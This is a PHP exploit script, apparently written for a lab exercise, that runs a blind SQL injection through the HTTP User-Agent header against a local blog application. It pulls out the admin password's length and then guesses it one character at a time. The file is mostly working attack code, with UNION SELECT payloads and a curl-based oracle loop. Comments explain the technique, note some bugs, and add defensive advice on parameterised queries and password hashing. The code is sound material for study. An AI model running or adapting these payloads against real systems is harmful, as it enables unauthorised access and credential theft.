Exploit_Blog_hack.php
<?php
// Script setup for a blind SQL-injection probe against a local lab target (WEBSITE below).
// No time limit: the probing loops below issue one HTTP request per guess.
set_time_limit(0);
// Plain-text output so the progressive echo in findPassword() is readable in a browser/CLI.
header("Content-type: text/plain");
//========== - Const - ==============================
// Target base URL (private-range lab address); every request goes to this one URL.
define('WEBSITE', 'http://192.168.0.134/blog_hack/');
// Step 1: learn how many characters the admin password has (one request per candidate length).
$length = findPasswordLength();
// Step 2: recover it character by character. NOTE: findPassword() echoes each character as it is
// found but never appends to its $result, so $pass is always "" — the output is on stdout only.
$pass = findPassword($length);
/**
 * Boolean-based blind SQLi oracle for the length of the admin password.
 *
 * Each iteration sends a UNION payload whose WHERE clause is true only when
 * LENGTH(password) equals $i; ok() turns the server's response into the
 * true/false signal. The loop has no upper bound, so it never returns if the
 * target is not injectable, is unreachable, or the oracle never fires.
 *
 * Defensive reading: this traffic is one request per candidate length, all to
 * the same URL, each carrying SQL keywords in the User-Agent header (see
 * callPage()). Parameterised queries remove the injection point entirely;
 * logging/alerting on SQL syntax in request headers detects the probing.
 *
 * @return int length of the password as reported by the oracle
 */
function findPasswordLength() {
$i = 0;
while (true) {
$i++;
// Payload is injected into whatever query consumes the User-Agent header server-side.
$payload = "' UNION SELECT 1,1,1 FROM user WHERE login = 'admin' AND LENGTH(password) = $i #";
if(ok(callPage($payload))) {
return $i;
}
}
}
/**
 * Recovers the admin password one position at a time via the same oracle as
 * findPasswordLength(): for position $i, each candidate character is tried
 * until ok() reports a match, then the character is echoed and flushed.
 *
 * Search space is digits plus lowercase a-z only; a password containing any
 * other character yields no match for that position and the loop silently
 * moves on (nothing is echoed for it). Worst case is 36 requests per position.
 *
 * NOTE: $result is initialised but never appended to, so the return value is
 * always ""; the recovered characters appear only in the streamed output.
 * ob_flush() is called without an output buffer having been started here.
 *
 * Defensive reading: same mitigation as findPasswordLength() — parameterised
 * queries; additionally, storing passwords as salted hashes (password_hash)
 * means an attacker who succeeds still obtains only a hash, not a credential.
 *
 * @param int $length number of positions to probe
 * @return string always "" (see note above)
 */
function findPassword($length) {
$letters = str_split("1234567890abcdefghijklmnopqrstuvwxyz");
$result = "";
echo "Password: "; flush(); ob_flush();
for($i = 1; $i <= $length; ++$i) {
foreach($letters as $letter) {
// True only when the character at position $i equals $letter (MySQL SUBSTRING is 1-based).
$payload = "' UNION SELECT 1,1,1 FROM user WHERE login = 'admin' AND SUBSTRING(password, $i, 1) = '$letter' #";
if(ok(callPage($payload))) {
echo $letter; flush(); ob_flush();
break;
}
}
}
return $result;
}
/**
 * Oracle decision: does the response body indicate a "hit"?
 *
 * The target renders a French "unsupported browser" message when the injected
 * condition is false; any page that does NOT contain that text (case-insensitive)
 * is treated as a positive answer.
 *
 * @param string $page response body from callPage()
 * @return bool true when the marker text is absent
 */
function ok($page) {
$marker = "Utilisation d'un navigateur non support";
return stripos($page, $marker) === false;
}
/**
 * Fetches WEBSITE once with the given string as the HTTP User-Agent header and
 * returns the raw response body.
 *
 * The User-Agent header is the injection channel: the payload is sent verbatim
 * there, not in the URL or POST body. curl_exec() returns false on transport
 * failure and that value is passed back unchanged to the caller.
 *
 * Defensive reading: request headers are attacker-controlled input just like
 * query parameters; any server-side code that stores or queries on the
 * User-Agent must bind it as a parameter, and request logs/WAF rules should
 * inspect headers, not only the URL, for SQL syntax.
 *
 * @param string $payload value sent as the User-Agent header
 * @return string|false response body, or false if the request failed
 */
function callPage($payload) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, WEBSITE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The SQL payload rides in the User-Agent header.
curl_setopt($ch, CURLOPT_USERAGENT, $payload);
$page = curl_exec($ch);
curl_close($ch);
return $page;
}
?>